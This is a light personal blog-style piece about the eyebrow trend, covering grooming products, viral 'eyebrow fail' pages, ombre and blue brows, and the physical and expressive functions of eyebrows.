If the eyes are apparently the windows to our soul, then it is fair to say our eyebrows are the curtains, right? Whether you’re a worshipper of the fashion tribe or boast a beauty regime that consists of just soap and water – the eyebrow trend seems impossible to ignore.
In recent times, a simple pair of well-groomed eyebrows just don’t cut it. My tweezers have long been a makeup bag staple (and the occasional brow pencil rolling around somewhere). Now there exists brow gel, brow wax, brow promenade, three different brushes and two shades of pencil. I find myself drawn to people’s eyebrows before I notice their actual eyes.
It would seem our obsession with eyebrows has intensified since the emergence of Cara Delevigne and her naturally defined yet distinctive eye curtains. Being the beauty junkie that I am, I was fast to board the brow brigade. Like many other trend-conscious girls, meticulously grooming them developed into a daily ritual. Due to my precision, I am confident my brows are semi-okay most days and I have come a long way since waxing them with sellotape when I was twelve.
Of course, there has been quite the social media stampede since brows broke onto the scene. Pages such as ‘These 28 Hilarious Eyebrow Fails Will Make You Cringe’ and ‘Epic HD Eyebrow Fails’ often clog my newsfeed with shares of eyebrows resembling slugs and the infamous Nike tick.
Typically, once we’ve come to terms with the art of brow-filling there’s a new brow frenzy: the ombre brow. Everyone’s dip-dying their hair so why not dip-dye our brows? When it’s spot-on, the ombre brow is impressive. Otherwise, it’s a total faux-pas much like the most recent beauty craze of blue eyebrows. WTF. Plastered on fashion week trend reports are beautiful faces bearing two aquamarine stripes above the eyes. In my opinion, blue eyebrows are more of a talking point than a fashion statement.
Aesthetics aside, eyebrows have very important physical and psychological functions. They soak up sweat before it drips into our eyes (nice…) and prevent debris from entering them too. As well as this, they shade our delicate eyes from the sun. A more obvious feature, is their ability to reflect emotion. Surprise, aggravation and sexiness are just a few of the emotions we can subconsciously express through our eyebrows.
